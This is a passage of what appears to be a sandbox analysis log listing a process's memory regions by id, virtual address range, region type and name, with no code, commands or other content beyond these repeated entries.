1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14495 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14496 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14497 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14498 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14499 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14500 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14501 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14502 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14503 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14504 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14505 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14506 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14507 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14508 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14509 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14510 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14511 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14512 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14513 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14514 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14515 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14516 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14517 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14518 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14519 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14520 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14521 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14522 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14523 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14524 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14525 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14526 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 14527 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14528 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14529 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14530 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14531 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14532 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14533 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14534 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14535 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14536 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14537 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14538 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14539 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14540 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14541 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14542 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14543 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14544 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14545 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14546 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14547 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14548 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14549 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14550 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14551 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14552 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14553 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14554 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14555 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14556 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14557 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14558 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14559 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14560 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14561 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14562 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14563 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14564 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14565 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14566 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14567 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14568 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 14569 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14570 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14571 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14572 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 14573 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14574 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14575 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14576 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 14577 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14578 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14579 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14580 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14581 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14582 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14583 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14584 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14585 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14586 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14587 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14588 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14589 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14590 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14591 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14592 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14593 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14594 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14595 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14596 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14597 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14598 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14599 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14600 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14601 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14602 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14603 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14604 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14605 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14606 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14607 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14608 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14609 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14610 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14611 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14612 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14613 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14614 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14615 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14616 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14617 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14618 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14619 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14620 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14621 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14622 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14623 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14624 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14625 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14626 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14627 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14628 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14629 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14630 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14631 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14632 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14633 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14634 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14635 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14636 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14637 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14638 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 14639 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14640 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14641 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14642 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14643 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14644 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14645 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14646 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14647 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14648 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14649 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14650 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14651 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14652 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14653 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14654 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14655 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14656 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14657 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14658 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14659 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14660 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14661 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14662 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14663 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14664 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14665 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14666 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14667 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14668 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14669 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14670 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14671 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14672 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14673 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14674 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14675 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14676 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14677 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14678 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14679 start_va 